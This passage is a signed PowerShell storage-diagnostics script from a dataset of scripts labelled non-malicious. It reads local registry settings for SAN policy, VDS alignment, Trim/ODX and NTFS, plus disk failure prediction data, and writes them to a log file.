# sGbiwZeBe+3W7UvnSSmnEyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3
# T8HhhUSJxAlMxdSlQy90lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS
# 4NaIjAsCAwEAAaOCAe0wggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRI
# bmTlUAXTgqoXNzcitW2oynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTAL
# BgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBD
# uRQFTuHqp8cx0SOJNDBaBgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jv
# c29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3JsMF4GCCsGAQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFf
# MDNfMjIuY3J0MIGfBgNVHSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEF
# BQcCARYzaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1h
# cnljcHMuaHRtMEAGCCsGAQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkA
# YwB5AF8AcwB0AGEAdABlAG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn
# 8oalmOBUeRou09h0ZyKbC5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7
# v0epo/Np22O/IjWll11lhJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0b
# pdS1HXeUOeLpZMlEPXh6I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/
# KmtYSWMfCWluWpiW5IP0wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvy
# CInWH8MyGOLwxS3OW560STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBp
# mLJZiWhub6e3dMNABQamASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJi
# hsMdYzaXht/a8/jyFqGaJ+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYb
# BL7fQccOKO7eZS/sl/ahXJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbS
# oqKfenoi+kiVH6v7RyOA9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sL
# gOppO6/8MO0ETI7f33VtY5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtX
# cVZOSEXAQsmbdlsKgEhr/Xmfwb1tbWrJUnMTDXpQzTGCGgowghoGAgEBMIGVMH4x
# CzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt
# b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01p
# Y3Jvc29mdCBDb2RlIFNpZ25pbmcgUENBIDIwMTECEzMAAAQDvdWVXQ87GK0AAAAA
# BAMwDQYJYIZIAWUDBAIBBQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQw
# HAYKKwYBBAGCNwIBCzEOMAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIGqq
# Tg4c3t9DtYK/iG1PA3tcbksy63gB8xcb+saN5MsBMEIGCisGAQQBgjcCAQwxNDAy
# oBSAEgBNAGkAYwByAG8AcwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20wDQYJKoZIhvcNAQEBBQAEggEAR/1zBxZChLfVgCnvVw78LTg8wmGkhQUoKJAo
# Ne2TcqoGX0jjVGhrr936KK89jao0rE4jg7Z6LLUoPjcLx4mo4hnLDDyXt7UNQ5Ir
# ABvYRvMvy1+XORGbH15n8gATah1NvkdH9clEB7ex9yNgZCwD4cB/qezrMTcE1vIV
# 0n6XeYBI7NIJ2GdZot3fgEynR3dEJ4skf7pZKUUsn3BHDMn1qfGqef1mxJ9F7vSn
# ZRFPmcI8f2pIT/Ete35FmzH5LXhuhJNkcWC6/WJmwF+SKNrYqnPbyVqHT9mhlzjS
# rXjWxjmmNqjWC/i6wIAIfz2pRHXo0DcjorduNWzidgEZc4GaFaGCF5QwgheQBgor
# BgEEAYI3AwMBMYIXgDCCF3wGCSqGSIb3DQEHAqCCF20wghdpAgEDMQ8wDQYJYIZI
# AWUDBAIBBQAwggFSBgsqhkiG9w0BCRABBKCCAUEEggE9MIIBOQIBAQYKKwYBBAGE
# WQoDATAxMA0GCWCGSAFlAwQCAQUABCAT3MRI6s7pVjz+Zd58qSjyb1QUody4TgqF
# 0Hldh5oS6AIGZxqGn7o8GBMyMDI0MTAyODExNDM0OC42MTNaMASAAgH0oIHRpIHO
# MIHLMQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQL
# ExxNaWNyb3NvZnQgQW1lcmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxk
# IFRTUyBFU046ODkwMC0wNUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1l
# LVN0YW1wIFNlcnZpY2WgghHqMIIHIDCCBQigAwIBAgITMwAAAe3hX8vV96VdcwAB
# AAAB7TANBgkqhkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2Fz
# aGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENv
# cnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAx
# MDAeFw0yMzEyMDYxODQ1NDFaFw0yNTAzMDUxODQ1NDFaMIHLMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSUwIwYDVQQLExxNaWNyb3NvZnQgQW1l
# cmljYSBPcGVyYXRpb25zMScwJQYDVQQLEx5uU2hpZWxkIFRTUyBFU046ODkwMC0w
# NUUwLUQ5NDcxJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2Uw
# ggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIKAoICAQCoMMJskrrqapycLxPC1H7z
# D7g88NpbEaQ6SjcTIRbzCVyYQNsz8TaL1pqFTEAPL1X7ojL4/EaEW+UjNqZs/ayM
# yW4YIpFPZP2x4FBMVCddseF2i+aMMjDHi0LcTQZxM2s3mFMrCZAWSfLYXYDIimFB
# z8j0oLWGy3VgLmBTKM4xLqv7DZUz8B2SoAmbEtp62ngSl0hOoN73SFwE+Y24SvGQ
# MWhykpG+vXDwcpWvwDe+TgnrLR7ATRFXN5JS26dm2yy6SYFMRYnME3dMHCQ/UQIQ
# QNC8nLmIvdKkAoWEMXtJsGEo3QrM2S2SBv4PpHRzRukzTtP+UAceGxM9JyrwUQP5
# OCEmW6YchEyRDSwP4hU9f7B0Ayh14Pw9vJo7jewNjeMPIkmneyLSi0ruv2ox/xRG
# tcJ9yBNC5BaRktjz7stPaojR+PDA2fuBtCo8xKlkt53mUb7AY+CZHHqhLm76pdMF
# 6BHv2TvwlVBeQRN22XjaVVRwCgjgJnNewt7PejcrpUn0qHLgLq+1BN1DzYukWkTr
# 7wT0zl0iXr+NtqUkWSOnWRfe8N21tB6uv3VkW8nFdChtbbZZz24peLtJEZuNrN8X
# f9PTPMzZXDJBI1EciR/91QcGoZFmVbFVb2rUIAs01+ZkewvbhmGVDefX9oZG4/K4
# gGUsTvTW+r1JZMxUT2MwqQIDAQABo4IBSTCCAUUwHQYDVR0OBBYEFM4b8Oz33hAq
# BEfKlAZf0NKh4CIZMB8GA1UdIwQYMBaAFJ+nFV0AXmJdg/Tl0mWnG1M1GelyMF8G
# A1UdHwRYMFYwVKBSoFCGTmh0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMv
# Y3JsL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBs
# BggrBgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93d3cubWljcm9zb2Z0
# LmNvbS9wa2lvcHMvY2VydHMvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUy
# MDIwMTAoMSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAwwCgYIKwYBBQUH
# AwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqGSIb3DQEBCwUAA4ICAQCd1gK2Rd+eGL0e
# Hi+iE6/qDY8sbbsO4emancp6KPN+xq5ZAatiBR4jmRRhm+9Vik0Fo0DLWi/N28bF
# I7dXYw09p3vCipbjy4Eoifm0Nud7/4U30i9+7RvW7XOQ3rx37+U7vq9lk6yYpGCN
# p0jlJ188/CuRPgqJnfq5EdeafH2AoG46hKWTeB7DuXasGt6spJOenGedSre34MWZ
# qeTIQ0raOItZnFuGDy4+xoD1qRz2QW+u2gCHaG8AQjhYUM4uTi9t6kttj6c7Xamr
# 2zrWuceDhz7sKLttLTJ7ws5YrA2I8cTlbMAf2KW0GVjKbYGd+LZGduEK7/7fs4GU
# kMqc51FsNdG1n+zgc7zHu2oGGeCBg4s8ZR0ZFyx7jsgm9sSFCKQ5CsbAvlr/60Nd
# k5TeMR8Js2kNUicu2CqZ03833TsvTgk7iD1KLgfS16HEvjN6m4VKJKgjJ7OJJzab
# tS4JQgUnJrIZfyosk4D18rZni9pUwN03WgTmd10WTwiZOu4g8Un6iKcPMY/iFqTu
# 4ntkzFUxBBpbFG6k1CINZmoirEWmCtG3lyZ2IddmjtIefTkIvGWb4Jxzz7l2m/E2
# kGOixDJHsahZVmwsoNvhy5ku/inU++dXHzw+hlvqTSFT89rIFVhcmsWPDJPNRSSp
# MhoJ33V2Za/lkKcbkUM0SbQgS9qsdzCCB3EwggVZoAMCAQICEzMAAAAVxedrngKb
# SZkAAAAAABUwDQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMwEQYDVQQI
# EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3Nv
# ZnQgQ29ycG9yYXRpb24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRpZmlj
# YXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4MjIyNVoXDTMwMDkzMDE4MzIy
# NVowfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT
# B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UE
# AxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEB
# AQUAA4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC0/3unAcH0qlsTnXI
# yjVX9gF/bErg4r25PhdgM/9cT8dm95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjo
# YH1qUoNEt6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZTfDlhAnrEqv1y
# aa8dq6z2Nr41JmTamDu6GnszrYBbfowQHJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v
# 3byNpOORj7I5LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVVmG1oO5pG
# ve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKyzbnijYjklqwBSru+cakXW2dg3viS
# kR4dPf0gz3N9QZpGdc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2TPYr
# bqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZfD9M269ewvPV2HM9Q07BMzlM
# jgK8QmguEOqEUUbi0b1qGFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL
# W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLUHMVr9lxSUV0S2yW6r1AF
# emzFER1y7435UsSFF5PAPBXbGjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIu
# rQIDAQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAjBgkrBgEEAYI3FQIE
# FgQUKqdS/mTEmr6CkTxGNSnPEP8vBO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWn
# G1M1GelyMFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYIKwYBBQUHAgEW
# M2h0dHA6Ly93d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5
# Lmh0bTATBgNVHSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4KAFMAdQBi
# AEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBTV
# 9lbLj+iiXGJo0T2UkFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8vY3Js
# Lm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0cy9NaWNSb29DZXJBdXRfMjAx
# MC0wNi0yMy5jcmwwWgYIKwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v
# d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jvb0NlckF1dF8yMDEwLTA2
# LTIzLmNydDANBgkqhkiG9w0BAQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv
# 6lwUtj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTCj/ts0aGUGCLu6WZn
# OlNN3Zi6th542DYunKmCVgADsAW+iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1
# bSNU5HhTdSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYSEhFdPSfgQJY4
# rPf5KYnDvBewVIVCs/wMnosZiefwC2qBwoEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU
# 6ZGyqVvfSaN0DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxybxCrdTDF
# NLB62FD+CljdQDzHVG2dY3RILLFORy3BFARxv2T5JL5zbcqOCb2zAVdJVGTZc9d/
# HltEAY5aGZFrDZ+kKNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2tVdU
# CbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4O+S3Fb+0zj6lMVGEvL8CwYKi
# excdFYmNcP7ntdAoGokLjzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm
# dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/ZcGNTTY3ugm2lBRDBcQZq
# ELQdVTNYs6FwZvKhggNNMIICNQIBATCB+aGB0aSBzjCByzELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjElMCMGA1UECxMcTWljcm9zb2Z0IEFtZXJp
# Y2EgT3BlcmF0aW9uczEnMCUGA1UECxMeblNoaWVsZCBUU1MgRVNOOjg5MDAtMDVF
# MC1EOTQ3MSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNloiMK
# AQEwBwYFKw4DAhoDFQDuHayKTCaYsYxJh+oWTx6uVPFw+aCBgzCBgKR+MHwxCzAJ
# BgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25k
# MR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMTHU1pY3Jv
# c29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBCwUAAgUA6smiIDAi
# GA8yMDI0MTAyODA1Mzk0NFoYDzIwMjQxMDI5MDUzOTQ0WjB0MDoGCisGAQQBhFkK
# BAExLDAqMAoCBQDqyaIgAgEAMAcCAQACAikmMAcCAQACAhNdMAoCBQDqyvOgAgEA
# MDYGCisGAQQBhFkKBAIxKDAmMAwGCisGAQQBhFkKAwKgCjAIAgEAAgMHoSChCjAI
# AgEAAgMBhqAwDQYJKoZIhvcNAQELBQADggEBAFmckdUeifZt8BprZ3zxv8eo/W1g
# eDvTCg+AfBgsP5eubV4pW8eAaVQPjzjVseXEjtLErgpcesWIgWtwjTBdGPVhCatB
# 3NRfg/awbJSa7tZm4sDycdvhoeYBZ3BqswvkYUxhhKUbAnZYYibg+H6YnGrog3UF
# 4G0KdCndtoLOLZfqFPkLDzGpuEBwwuEfDjxgLz2GfRP0jeSHOA0d2f5CnwY3Tij2
# x/Thsl/+cvbZ4a/Eqb8pD8brFUdxFlOHbW3UMTLvz863JdgDarmdvyz/z5x1qIsW
# wKHlydHqbGF6reb09z9dEdUNok4tjGHZW5O/uOd7Y340oWdSzkS012Nnz8UxggQN
# MIIECQIBATCBkzB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ
# MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u
# MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAe3h
# X8vV96VdcwABAAAB7TANBglghkgBZQMEAgEFAKCCAUowGgYJKoZIhvcNAQkDMQ0G
# CyqGSIb3DQEJEAEEMC8GCSqGSIb3DQEJBDEiBCDT6MbOWOWALvC8nJO6/5kRKnYS
# th+gvmlSLzyx6t4soDCB+gYLKoZIhvcNAQkQAi8xgeowgecwgeQwgb0EII0uDWg0
# CFseKxK3A16l1wrIwrsSDrXZ6xSf0F4xbMo5MIGYMIGApH4wfDELMAkGA1UEBhMC
# VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNV
# BAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRp
# bWUtU3RhbXAgUENBIDIwMTACEzMAAAHt4V/L1felXXMAAQAAAe0wIgQgJHwmHNb0
# a877pzs9GGBhooAWbWExml1o498sDW/Bg5wwDQYJKoZIhvcNAQELBQAEggIATGrj
# VCeUXbsJmM77oSvA9BHgwtcr522zVbJtv0SbxPwO98Sbg+NFdAB98iEIIQE7GlpO
# BbzacBiuy6/varK7L0er31H67jOeF7KnA3ATX5V+XnAWySBkKK+wh9Bo4VqREi7j
# es82ph9bJ6IxVxLMb9ab8e9twEdnzded23a+Gu5rXUM+X8ScVo3WrY/tHjrEDzhZ
# dpl8R6fbzZ7HVL2mekaqy06D1L+6DAeV/3wC8Zl5Wzh1ok7fZQ4/URhHrTINsrzd
# b/iajj4/T+/NTHdLeyeINyF3Ama5pJI1qVSSAQS0edhrHcDILUN/pN+GFLnhxuhn
# jEkMXrrrJmz1JW8o4sKxvpj8q7LXwxlqrZ4ASI3IO//z0/OmDEas3W1GwsPdr/Gn
# fjjycWi0rqOaqQT/Q631PReUSOfUNSe1cWLuN4P2ca5Ktl6yoIisARQsfE/cSzsh
# Uw/65t0QzhAEXdmSta0PAP+ZgQ33bgz4d4pzkiKHC2OW9U3yIyRHWWwT32d05f0k
# Tuf0VLieuNGfj6xm45KAtzZ5/N4X0Af1nyktsz/lO3t48b7A5hjZtMI8lbEp+neV
# +JifvS9CBzVG4FPu88yjOXqxLoewX/NmD0ub//fK/EqBmR8eldk3tgK2KPfJSSm1
# Jdf5jSS+3OGvEEVzYOq1jjr4/U+EV1qio3Yq6Vk=
# SIG # End signature block
|
combined_dataset/train/non-malicious/sample_15_4.ps1
|
sample_15_4.ps1
|
#region 'Old Code'
<#
if ($OSVersion.Major -eq 5)
{
# Disabling running on Win2K3 x64 due some reports of crashes for specific controllers
"[San.exe] - Skipping running san.exe on Windows prior to Server 2008" | WriteTo-StdOut
}
else
{
Import-LocalizedData -BindingVariable SanStorageInfoStrings
Write-DiagProgress -Activity $SanStorageInfoStrings.ID_SanDev -Status $DOSDevStrings.ID_SanDevRunning
$fileDescription = $SanStorageInfoStrings.ID_SanStorageInfoOutput
$sectionDescription = $SanStorageInfoStrings.ID_SanStorageInfoOutputDesc
$OutputFile = $ComputerName + "_Storage_Information.txt"
$CommandToExecute = "cmd.exe /c SAN.exe $CommandToAdd"
RunCmD -commandToRun $CommandToExecute -sectionDescription $sectionDescription -filesToCollect $OutputFile -fileDescription $fileDescription
}
#>
#endregion
<#
COLLECTING FOLLOWING INFORMATION:
----------------------------------------------
Important registry entries related to storage.
Trim support
Thin provisioning
ODX support
Device drivers and settings (if appropriate)
DSM settings
SCSI registry information
SCSI inquiry information
SCSI reservation information
Tape Devices
Tape Changers
VDS information
MPIO information
Disk failure prediction information
iSCSI connection information
NTFS information
#>
Import-LocalizedData -BindingVariable SanStorageInfoStrings
Write-DiagProgress -Activity $SanStorageInfoStrings.ID_SanDev -Status $DOSDevStrings.ID_SanDevRunning
$fileDescription = $SanStorageInfoStrings.ID_SanStorageInfoOutput
$sectionDescription = $SanStorageInfoStrings.ID_SanStorageInfoOutputDesc
$OutputFile = ("{0}_StorageInfo.LOG" -f $env:COMPUTERNAME)
$temp = (Get-CimInstance -Class Win32_OperatingSystem).Version.Split('.')
[Float]$OSVersion = [Float]("$($temp[0]).$($temp[1])")
if([Float]$OSVersion -lt [Float](6.0))
{
# Skipping collecting storage info on Windows prior to Server 2008.
return
}
# ============================================= #
# Generic Info
# ============================================= #
"`n" | Out-File -FilePath $OutputFile -Append
$os = Get-CimInstance Win32_OperatingSystem
"{0, -17}: {1} (Build {2}) [{3}]" -f 'Operating System', ($os.Caption), ($os.BuildNumber), ($os.OSArchitecture) | Out-File -FilePath $OutputFile -Append
"{0, -17}: {1}" -f 'Processor', ((Get-CimInstance Win32_Processor).Name) | Out-File -FilePath $OutputFile -Append
"{0, -17}: {1}" -f 'Log Time', (Get-Date -Format 'HH:mm:ss yyyy/MM/dd') | Out-File -FilePath $OutputFile -Append
"`n" | Out-File -FilePath $OutputFile -Append
# ============================================= #
# VDS Alignment
# ============================================= #
$regKeyVDSAlignment = 'HKLM:\SYSTEM\ControlSet001\Services\vds\Alignment'
if(Test-Path ($regKeyVDSAlignment))
{
'=============================================' | Out-File -FilePath $OutputFile -Append
'VDS Alignment' | Out-File -FilePath $OutputFile -Append
'=============================================' | Out-File -FilePath $OutputFile -Append
"`n" | Out-File -FilePath $OutputFile -Append
'INFO: Alignment Settings in Bytes' | Out-File -FilePath $OutputFile -Append
"`n" | Out-File -FilePath $OutputFile -Append
'Between4_8GB', 'Between8_32GB', 'GreaterThan32GB', 'LessThan4GB' | ForEach-Object {
"{0,-16}: {1}" -f $_, ((Get-ItemProperty -Path $regKeyVDSAlignment -Name $_ -ErrorAction SilentlyContinue)."$_") | Out-File -FilePath $OutputFile -Append
}
"`n" | Out-File -FilePath $OutputFile -Append
}
# ============================================= #
# SAN Policy
# ============================================= #
Add-Type -TypeDefinition @"
public enum SANPolicy
{
VDS_SP_UNKNOWN = 0x0,
VDS_SP_ONLINE = 0x1,
VDS_SP_OFFLINE_SHARED = 0x2,
VDS_SP_OFFLINE = 0x3
}
"@
$sanPolicyDescriptions = @{
'VDS_SP_UNKNOWN' = 'The SAN policy is unknown.';
'VDS_SP_ONLINE' = 'All newly discovered disks are brought online and made read-write.';
'VDS_SP_OFFLINE_SHARED' = 'All newly discovered disks that do not reside on a shared bus are brought online and made read-write.';
'VDS_SP_OFFLINE' = 'All newly discovered disks remain offline and read-only.'}
[SANPolicy] $sanPolicy = 0
$regKeySanPolicy = 'HKLM:\SYSTEM\CurrentControlSet\Services\partmgr\Parameters'
if(Test-Path ($regKeySanPolicy))
{
$sanPolicyRegValue = (Get-ItemProperty -Path $regKeySanPolicy -Name 'SanPolicy' -ErrorAction SilentlyContinue).SanPolicy
if($sanPolicyRegValue)
{
'=============================================' | Out-File -FilePath $OutputFile -Append
'SAN Policy' | Out-File -FilePath $OutputFile -Append
'=============================================' | Out-File -FilePath $OutputFile -Append
"`n" | Out-File -FilePath $OutputFile -Append
$sanPolicy = [Enum]::ToObject([SANPolicy], $sanPolicyRegValue)
"{0} ({1}): {2}" -f $sanPolicy.value__, $sanPolicy, ($sanPolicyDescriptions.Get_Item("$sanPolicy")) | Out-File -FilePath $OutputFile -Append
"`n" | Out-File -FilePath $OutputFile -Append
'Refer: https://msdn.microsoft.com/en-us/library/bb525577.aspx' | Out-File -FilePath $OutputFile -Append
"`n" | Out-File -FilePath $OutputFile -Append
}
}
# ============================================= #
# File System Settings
# ============================================= #
$regKeyFileSystem = 'HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem'
if(Test-Path ($regKeyFileSystem))
{
'=============================================' | Out-File -FilePath $OutputFile -Append
'File System Settings' | Out-File -FilePath $OutputFile -Append
'=============================================' | Out-File -FilePath $OutputFile -Append
"`n" | Out-File -FilePath $OutputFile -Append
# Trim/UnMap Support
$regValueDisableDeleteNotification = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem -Name 'DisableDeleteNotification' -ErrorAction SilentlyContinue
if($regValueDisableDeleteNotification)
{
"{0, -38}: {1} (Trim/UnMap {2})" -f 'DisableDeleteNotification', ($regValueDisableDeleteNotification.DisableDeleteNotification), `
(('Disabled','Enabled')[$regValueDisableDeleteNotification.DisableDeleteNotification -eq 0]) | Out-File -FilePath $OutputFile -Append
}
# ODX Support
$regValueFilterSupportedFeaturesMode = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem -Name 'FilterSupportedFeaturesMode' -ErrorAction SilentlyContinue
if($regValueDisableDeleteNotification)
{
"{0, -38}: {1} (ODX {2})" -f 'FilterSupportedFeaturesMode', ($regValueFilterSupportedFeaturesMode.FilterSupportedFeaturesMode), `
(('Disabled','Enabled')[$regValueFilterSupportedFeaturesMode.FilterSupportedFeaturesMode -eq 0]) | Out-File -FilePath $OutputFile -Append
}
"`n" | Out-File -FilePath $OutputFile -Append
"`n" | Out-File -FilePath $OutputFile -Append
'Other values from "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem"' | Out-File -FilePath $OutputFile -Append
Get-ItemProperty $regKeyFileSystem -ErrorAction SilentlyContinue | Format-List -Property NtfsAllowExtendedCharacter8dot3Rename, NtfsBugcheckOnCorrupt, NtfsDisable8dot3NameCreation, `
NtfsDisableCompression, NtfsDisableEncryption, NtfsDisableLastAccessUpdate, NtfsDisableLfsDowngrade, NtfsDisableVolsnapHints, NtfsEncryptPagingFile, NtfsMemoryUsage, `
NtfsMftZoneReservation, NtfsQuotaNotifyRate, ScrubMode, SymlinkLocalToLocalEvaluation, SymlinkLocalToRemoteEvaluation, SymlinkRemoteToLocalEvaluation, SymlinkRemoteToRemoteEvaluation, `
UdfsCloseSessionOnEject, UdfsSoftwareDefectManagement, Win31FileSystem, Win95TruncatedExtensions | Out-File -FilePath $OutputFile -Append
}
# ============================================= #
# Disk Failure Prediction
# ============================================= #
'=============================================' | Out-File -FilePath $OutputFile -Append
'Disk Failure Prediction' | Out-File -FilePath $OutputFile -Append
'=============================================' | Out-File -FilePath $OutputFile -Append
Get-CimInstance -Namespace Root\WMI -Class MSStorageDriver_FailurePredictStatus -ErrorAction Silentlycontinue | Select-Object InstanceName, PredictFailure, Reason, Active | Format-Table -Wrap -AutoSize -GroupBy PredictFailure | Out-File -FilePath $OutputFile -Append
if([Float]$OSVersion -lt [Float](6.2))
{
# ============================================= #
# Disk Information
# ============================================= #
'==============================================' | Out-File -FilePath $OutputFile -Append
'Disk Information' | Out-File -FilePath $OutputFile -Append
'==============================================' | Out-File -FilePath $OutputFile -Append
$items = @('Name', 'Index', 'Status', 'StatusInfo', 'Access', 'Availability', 'BlockSize', 'Bootable', 'BootPartition', 'ConfigManagerErrorCode', 'ConfigManagerUserConfig', 'Description', 'DeviceID', 'DiskIndex', 'ErrorCleared', 'ErrorDescription', 'ErrorMethodology', 'HiddenSectors', 'InstallDate', 'LastErrorCode', 'NumberOfBlocks', 'PowerManagementCapabilities', 'PowerManagementSupported', 'PrimaryPartition', 'Purpose', 'RewritePartition', 'Size', 'StartingOffset', 'Type', 'Properties')
Get-CimInstance Win32_DiskPartition | Format-List $items | Out-File -FilePath $OutputFile -Append
# ============================================= #
# Volume Information
# ============================================= #
'==============================================' | Out-File -FilePath $OutputFile -Append
'Volume Information' | Out-File -FilePath $OutputFile -Append
'==============================================' | Out-File -FilePath $OutputFile -Append
